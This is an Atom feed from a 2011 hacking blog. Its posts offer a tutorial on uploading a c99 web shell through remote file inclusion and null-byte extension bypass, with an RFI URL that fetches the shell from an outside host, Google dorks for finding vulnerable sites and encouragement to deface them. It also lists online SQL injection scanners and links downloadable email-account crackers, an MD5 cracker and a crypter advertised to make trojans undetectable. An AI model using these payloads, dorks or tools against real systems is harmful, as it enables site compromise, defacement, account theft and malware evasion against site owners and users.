<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" gd:etag="W/&quot;C0QGRHczfCp7ImA9WhRVFE8.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782</id><updated>2012-01-12T18:22:05.984-08:00</updated><category term="Local root Exploit" /><category term="bot" /><category term="sms" /><category term="Cracking" /><category term="Keyloggers" /><category term="Social Engineering" /><category term="Hacking News" /><category term="best hacking tools" /><category term="Encryption software server Poison Ivy" /><category term="Tutorial" /><category term="Hacking Tutorials" /><category term="UPLOAD SHELL" /><category term="Tutorials" /><category term="Trojan Killer" /><category term="2012" /><category term="Shell" /><category term="Pangolin" /><category term="Courses" /><category term="SQL INJECTION" /><category term="Web Hacking" /><category term="rfi Dorks" /><category term="rooting" /><category term="Proxy Tools" /><category term="login spoofer" /><category term="rooting a server" /><category term="reiluke tools" /><category term="Huge Collection Of Hack Tutorial Videos" /><category term="Password Stealers" /><category term="hacking tools" /><category term="vb.net" /><category term="sql scaner" /><category term="sql injection tools" /><title>Ksecurity-team</title><subtitle type="html">Sql Injection Masters</subtitle><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://sql-injection-tools.blogspot.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default?start-index=26&amp;max-results=25&amp;redirect=false&amp;v=2" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>313</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/Ksecurity-teamSqlInjectionwebHackingwebSecurity" /><feedburner:info uri="ksecurity-teamsqlinjectionwebhackingwebsecurity" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><entry gd:etag="W/&quot;D0EHRXs9eCp7ImA9WhdTE0o.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-7964279955699880518</id><published>2011-07-11T02:13:00.001-07:00</published><updated>2011-07-11T02:13:54.560-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-07-11T02:13:54.560-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="UPLOAD SHELL" /><title>[TuT]THE WAY, TO UPLOAD SHELL ON VULNERABLE SITES[TuT</title><content type="html">&lt;div class="post_body" id="pid_11686956"&gt;      &lt;span style="color: limegreen;"&gt;#&lt;/span&gt;&lt;br /&gt;
The c99 shell is almost always used in remote file includes. That means  that you get the remote server to 'host' the shell without any needing  to upload it to take control over it. Read: RFI&lt;br /&gt;
&lt;span style="color: limegreen;"&gt;#&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: limegreen;"&gt;#&lt;/span&gt;&lt;br /&gt;
A remote include works like this:&lt;br /&gt;
&lt;span style="color: limegreen;"&gt;#&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: limegreen;"&gt;#&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
A website written in PHP includes files from a local directory. It  usually looks something like this in the URL:  "http://test.com/index.php?file=whatever" The part after the "?file=" is  the locally included file. I'm really not going to get into how the RFI  actually works, because it's beyond the scope of this. So, to include  the file you would host it locally in a .txt and include it by doing :  "http://test.com/index.php?file=http://yoursite.com/index.php?file=c99shell.txt?.php&lt;br /&gt;
&lt;span style="color: limegreen;"&gt;#&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: limegreen;"&gt;#&lt;/span&gt;&lt;br /&gt;
Get it?&lt;br /&gt;
&lt;span style="color: limegreen;"&gt;#&lt;/span&gt;&lt;br /&gt;
(I can't quite remember how to run it via URL because it's been so damn long since I've done it. lol)&lt;br /&gt;
&lt;span style="color: limegreen;"&gt;#&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: limegreen;"&gt;#&lt;/span&gt;&lt;br /&gt;
Now, what Clover was talking about is using a Null Byte attack. You just  upload your shell via an upload form. Because most forms filter out  certain extensions uploading .php is almost impossible. With a Null Byte  attack though, it's made possible.&lt;br /&gt;
&lt;span style="color: limegreen;"&gt;#&lt;br /&gt;
&lt;br /&gt;
#&lt;/span&gt;&lt;br /&gt;
Now, lets take our usual picture upload form. This form filters out  extensions such as .exe, .js, .php, .xml and so on and so forth. So if  you were to try and upload C:\My Documents\shell.php it would return an  error. The Null Byte works around this simple security measure because a  Null Byte can be used as a string terminator. In simple terms, it tells  the server where the string ends. Now, how it works. As we know, if we  try to upload with a .php extension, we get returned an error. If we add  a Null Byte to that string, with an acceptable extension we can bypass  the extension check of the form. The Null Byte is represented in simple  text for as "". So, back to the upload form we go. As we go to upload  our shell "C:\My Documents\shell.php" we will add to the end of that a  Null Byte along with an extension. Now it looks something like this  "C:\My Documents\shell.php.jpg"&lt;br /&gt;
&lt;span style="color: limegreen;"&gt;#&lt;br /&gt;
&lt;br /&gt;
#&lt;/span&gt;&lt;br /&gt;
(extra info: Most forms now prohibit the use of special characters such  as %,#,@,*,$ just for this reason. Forms now also prevent the clicking  in the text area to prevent the addition of string terminators" and the  like)&lt;br /&gt;
&lt;span style="color: limegreen;"&gt;#&lt;br /&gt;
&lt;br /&gt;
#&lt;/span&gt;&lt;br /&gt;
Now, the problem that I always ran into when I first started using Null  Byte attacks was that I could never find where it went. It would upload  fine, but I could never actually execute the shell. This was worked  around by using HTTPLiveHeaders (firefox addon). Monitoring while I  uploaded the shell would give me the exact location of where the file  was stored. Copy the destination of the uploaded file and paste into the  URL bar and everything would work out from there. Of course, that is if  the person doesn't have a script to automatically check the extension  again and assign the proper one, or if they use a script to copy, move  to another destination, and delete.&lt;br /&gt;
&lt;span style="color: limegreen;"&gt;#&lt;br /&gt;
&lt;br /&gt;
#&lt;/span&gt;&lt;br /&gt;
Everyone got it now?&lt;br /&gt;
&lt;span style="color: limegreen;"&gt;#&lt;br /&gt;
&lt;br /&gt;
#&lt;/span&gt;&lt;br /&gt;
If all things go according to plan, your shell shall be uploaded and you can now take control.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;II)&lt;/span&gt;&lt;br /&gt;
---&lt;br /&gt;
Defacing a Site using a c99 shell&lt;br /&gt;
Okay first what is defacing? Well defacing is like you remove some  contents of the site and show that it has been hacked by you. Defacing  is a very good way of proving your a good hacker. Okay so lets get  started&lt;br /&gt;
First you need a c99 shell, which can be easily found on google&lt;br /&gt;
Your antivirus might think its a virus but it isnt! Okay now you will  need to find exploitable sites. Here are some ways to find it&lt;br /&gt;
Google Dork:&lt;br /&gt;
&lt;blockquote&gt;&lt;cite&gt;Quote:&lt;/cite&gt;inurl:"upload.php"&lt;/blockquote&gt;&lt;br /&gt;
&lt;blockquote&gt;&lt;cite&gt;Quote:&lt;/cite&gt;inurl:"page=home.html"&lt;/blockquote&gt;&lt;br /&gt;
&lt;blockquote&gt;&lt;cite&gt;Quote:&lt;/cite&gt;inurl:"news/id="&lt;/blockquote&gt;&lt;br /&gt;
That is one way of finding a c99 shell. See always upload a c99 shell  with a .TXT or .JPG extension. You can change the extension but it wont  change anything in the shell. I just leave mine as a c99.txt.&lt;br /&gt;
Another way of finding vulnerable sites is finding a random website that shows&lt;br /&gt;
&lt;blockquote&gt;&lt;cite&gt;Quote:&lt;/cite&gt;&lt;a href="http://site.com/page=" target="_blank"&gt;http://site.com/page=&lt;/a&gt;&lt;/blockquote&gt;&lt;br /&gt;
On that page= you can put your shell so it would look like&lt;br /&gt;
&lt;blockquote&gt;&lt;cite&gt;Quote:&lt;/cite&gt;&lt;a href="http://site.com/page=http://geocities.com/noimus13/c99.txt" target="_blank"&gt;http://site.com/page=http://geocities.co...13/c99.txt&lt;/a&gt;&lt;/blockquote&gt;&lt;br /&gt;
&lt;span style="font-size: x-small;"&gt;credits To  RiTaLiN&lt;/span&gt;     &lt;/div&gt;&lt;hr style="background: #000; width: 20%;" /&gt; &lt;div style="max-height: 200px; overflow: hidden;"&gt;&lt;div style="text-align: center;"&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-7964279955699880518?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/ynyib6HAG1Dgg-BtNaL7Y6KrvLM/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ynyib6HAG1Dgg-BtNaL7Y6KrvLM/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/ynyib6HAG1Dgg-BtNaL7Y6KrvLM/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ynyib6HAG1Dgg-BtNaL7Y6KrvLM/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/Rn1tEjGTs44" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/7964279955699880518/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/07/tutthe-way-to-upload-shell-on.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/7964279955699880518?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/7964279955699880518?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/Rn1tEjGTs44/tutthe-way-to-upload-shell-on.html" title="[TuT]THE WAY, TO UPLOAD SHELL ON VULNERABLE SITES[TuT" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/07/tutthe-way-to-upload-shell-on.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D0MAQH48cCp7ImA9WhdTE0o.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-5386323789425699083</id><published>2011-07-11T02:10:00.001-07:00</published><updated>2011-07-11T02:10:41.078-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-07-11T02:10:41.078-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="sql scaner" /><title>list of online SQLi scanners, Very handy</title><content type="html">&lt;a href="http://scanner.drie88.tk/" target="_blank"&gt;http://scanner.drie88.tk/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://the-invisible.org/sqli.php" target="_blank"&gt;http://the-invisible.org/sqli.php&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://wolfscps.com/gscanner.php" target="_blank"&gt;http://wolfscps.com/gscanner.php&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://cattuong.net/" target="_blank"&gt;http://cattuong.net/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.sunmagazin.com/tools/hack/SQLI-Scan/" target="_blank"&gt;http://www.sunmagazin.com/tools/hack/SQLI-Scan/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.be007.gigfa.com/scanner/scanner.php" target="_blank"&gt;http://www.be007.gigfa.com/scanner/scanner.php&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan/" target="_blank"&gt;http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-5386323789425699083?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/78-RSObmSmIFdM2NCU1-vV2xxMs/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/78-RSObmSmIFdM2NCU1-vV2xxMs/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/78-RSObmSmIFdM2NCU1-vV2xxMs/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/78-RSObmSmIFdM2NCU1-vV2xxMs/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/bE4B_6CIC4A" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/5386323789425699083/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/07/list-of-online-sqli-scanners-very-handy.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/5386323789425699083?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/5386323789425699083?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/bE4B_6CIC4A/list-of-online-sqli-scanners-very-handy.html" title="list of online SQLi scanners, Very handy" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>2</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/07/list-of-online-sqli-scanners-very-handy.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkICQHo5eip7ImA9WhZQFUs.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-2974117634769296294</id><published>2011-04-23T05:09:00.000-07:00</published><updated>2011-04-23T05:09:21.422-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-04-23T05:09:21.422-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="best hacking tools" /><title>[Release] Cryptinator - A simple Encryption Application</title><content type="html">So today i decided to make a program like the following one i saw earlier.&lt;br /&gt;
&lt;img alt="[Image: 43201152623pm.png]" border="0" src="http://img13.imageshack.us/img13/1360/43201152623pm.png" /&gt;&lt;br /&gt;
&lt;br /&gt;
But instead of just copying it exactly, i used a different encryption  algorithm (polystairs) and different methods towards  generating/compiling a code.&lt;br /&gt;
&lt;br /&gt;
Im not sure what you would have use for this, but for me when ever i  need a completely random string i will use this now :D prolly for some  other things but yea. Hope you guys enjoy it! :D&lt;br /&gt;
&lt;br /&gt;
Cryptinator ScreenShot:&lt;br /&gt;
&lt;img alt="[Image: screenshotzu.png]" border="0" src="http://img232.imageshack.us/img232/2382/screenshotzu.png" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.virustotal.com/file-scan/report.html?id=87f6394fd1f583775cbee679eb9a5f4c0d8348cff0c26edf68c34dea64aab06c-1301876986" target="_blank"&gt;Virus Scan&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://uploading.com/files/8e2647c8/Cryptinator.exe/" target="_blank"&gt;Download&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-2974117634769296294?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/hJX3jYYFS_NLsI8Jc2Hn5RekY5s/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/hJX3jYYFS_NLsI8Jc2Hn5RekY5s/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/hJX3jYYFS_NLsI8Jc2Hn5RekY5s/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/hJX3jYYFS_NLsI8Jc2Hn5RekY5s/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/CsQZITwzjvo" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/2974117634769296294/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/04/release-cryptinator-simple-encryption.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/2974117634769296294?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/2974117634769296294?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/CsQZITwzjvo/release-cryptinator-simple-encryption.html" title="[Release] Cryptinator - A simple Encryption Application" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>0</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/04/release-cryptinator-simple-encryption.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkQMQnc_eyp7ImA9WhZQFUs.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-5041378912102307826</id><published>2011-04-23T05:06:00.000-07:00</published><updated>2011-04-23T05:06:23.943-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-04-23T05:06:23.943-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="best hacking tools" /><title>UniCrack v1.0 Beta/Trial [Gmail,Hotmail,Live,Yahoo] Cracker</title><content type="html">&lt;a href="http://img823.imageshack.us/i/unicrack.gif/" target="_blank"&gt;&lt;img alt="[Image: unicrack.gif]" border="0" src="http://img823.imageshack.us/img823/3796/unicrack.gif" /&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.megaupload.com/?d=HBDRNQTG" target="_blank"&gt;UniCrack v1.0 [Download]&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.virustotal.com/file-scan/report.html?id=34e545ba342b632c542a12c13239f62d1c65221a678f0c76ec8af76fac35f5a1-1303455340" target="_blank"&gt;[VirusTotal Scan]&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
VirusTotal Detects 1/41 &lt;br /&gt;
&lt;br /&gt;
Ikarus T3.1.1.103.0 2011.04.22 HackTool.Win32.VB.jz&lt;br /&gt;
&lt;br /&gt;
not really sure why ? false positive tho feel free to Sandbox / Virtual Machine your heart out.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-5041378912102307826?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/wQYGXcvK9jldquJ2jRJcCQb9VvQ/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/wQYGXcvK9jldquJ2jRJcCQb9VvQ/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/wQYGXcvK9jldquJ2jRJcCQb9VvQ/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/wQYGXcvK9jldquJ2jRJcCQb9VvQ/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/mgMXVEJSFlY" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/5041378912102307826/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/04/unicrack-v10-betatrial.html#comment-form" title="4 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/5041378912102307826?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/5041378912102307826?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/mgMXVEJSFlY/unicrack-v10-betatrial.html" title="UniCrack v1.0 Beta/Trial [Gmail,Hotmail,Live,Yahoo] Cracker" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>4</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/04/unicrack-v10-betatrial.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkQFQn05eCp7ImA9WhZQFUs.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-1827878458730075815</id><published>2011-04-23T05:05:00.000-07:00</published><updated>2011-04-23T05:05:13.320-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-04-23T05:05:13.320-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="sql injection tools" /><title>[Tool]MD5 Crack Fast</title><content type="html">&lt;span style="color: gold;"&gt;Screenshot:&lt;/span&gt;&lt;br /&gt;
&lt;img alt="[Image: WLGnn.jpg]" border="0" src="http://i.imgur.com/WLGnn.jpg" /&gt;&lt;br /&gt;
&lt;img alt="[Image: ?action=result_img&amp;amp;task_id=192d4...mage=1.png]" border="0" src="http://anubis.iseclab.org/?action=result_img&amp;amp;task_id=192d4eeb6abdc271425cd480769760f4e&amp;amp;image=1.png" /&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;Pack Contains :&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
[&lt;span style="color: limegreen;"&gt;√&lt;/span&gt;]&lt;span style="color: white;"&gt;MD5 Crack Fast&lt;/span&gt;&lt;br /&gt;
&lt;del&gt;&lt;span style="color: white;"&gt;Ultimate Distributed Cracker&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: white;"&gt;Last Bit Md5 Password Cracker&lt;/span&gt;&lt;br /&gt;
&lt;/del&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #9370db;"&gt;Virus Scan - Analysis etc&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div&gt;&lt;div class="spoiler_header"&gt;Spoiler &lt;a href=""&gt;(Click to Hide)&lt;/a&gt;&lt;/div&gt;&lt;div class="spoiler_body" style="display: block;"&gt; &lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=11c9ab809613b9744157c1082286c7d82&amp;amp;format=html" target="_blank"&gt;http://anubis.iseclab.org/?action=result...ormat=html&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://anubis.iseclab.org/?action=result&amp;amp;task_id=135b73ce66a8e8654fd7ebcdeab2d6575&amp;amp;format=html" target="_blank"&gt;http://anubis.iseclab.org/?action=result...ormat=html&lt;/a&gt;&lt;br /&gt;
&lt;a href="https://www.virustotal.com/file-scan/report.html?id=5455f311a29f82f84820f60542d9518582c98c58f852a0b54f102d2db657e8b8-1298111498" target="_blank"&gt;https://www.virustotal.com/file-scan/rep...1298111498&lt;/a&gt;&lt;br /&gt;
&lt;a href="https://www.virustotal.com/file-scan/report.html?id=dcf52bd5e8dec342098e93ab038bddf738259653025213718101acaadefb1c27-1295825212" target="_blank"&gt;https://www.virustotal.com/file-scan/rep...1295825212&lt;/a&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;img alt="[Image: D3Vxu.gif]" border="0" src="http://i.imgur.com/D3Vxu.gif" /&gt;&lt;br /&gt;
&lt;div&gt;&lt;div class="spoiler_header"&gt;Spoiler &lt;a href=""&gt;(Click to Hide)&lt;/a&gt;&lt;/div&gt;&lt;div class="spoiler_body" style="display: block;"&gt; &lt;a href="http://hotfile.com/dl/112001576/3635c2a/FAST210.rar.html" target="_blank"&gt;&lt;img alt="[Image: download-icon.gif]" border="0" src="http://www.karakonstantis.gr/blog/wp-includes/images/download-icon.gif" /&gt;&lt;/a&gt; &lt;span style="color: limegreen;"&gt;&amp;lt;--- &lt;/span&gt;&lt;span style="color: mediumblue;"&gt;PRESS THE BOX TO DOWNLOAD!&lt;/span&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;span style="color: deepskyblue;"&gt;Please leave feedback/say thanks if you have downloaded it&lt;/span&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-1827878458730075815?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/mMG0S70jhKxnGlIGFXNs8DnjzQ0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/mMG0S70jhKxnGlIGFXNs8DnjzQ0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/mMG0S70jhKxnGlIGFXNs8DnjzQ0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/mMG0S70jhKxnGlIGFXNs8DnjzQ0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/F2aC-RJfK7o" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/1827878458730075815/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/04/toolmd5-crack-fast.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/1827878458730075815?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/1827878458730075815?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/F2aC-RJfK7o/toolmd5-crack-fast.html" title="[Tool]MD5 Crack Fast" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>2</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/04/toolmd5-crack-fast.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkUBRHw_cSp7ImA9WhZQFUs.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-1247320336408143150</id><published>2011-04-23T05:04:00.001-07:00</published><updated>2011-04-23T05:04:15.249-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-04-23T05:04:15.249-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="best hacking tools" /><title>iCrypt Err0r Version</title><content type="html">his crypter makes ur trojan undetected&lt;br /&gt;
&lt;br /&gt;
Never Upload @ virustotal use only NoVirusThanks.org&lt;br /&gt;
&lt;br /&gt;
&lt;img alt="[Image: proggy.jpg]" border="0" src="http://viprasys.org/xfs/image/direct/BSk0g2AIBR/proggy.jpg" /&gt; &lt;br /&gt;
&lt;br /&gt;
Download &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.4shared.com/file/z1KjxfDn/iCrypt_Err0r_Version.html" target="_blank"&gt;http://www.4shared.com/file/z1KjxfDn/iCr...rsion.html&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-1247320336408143150?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
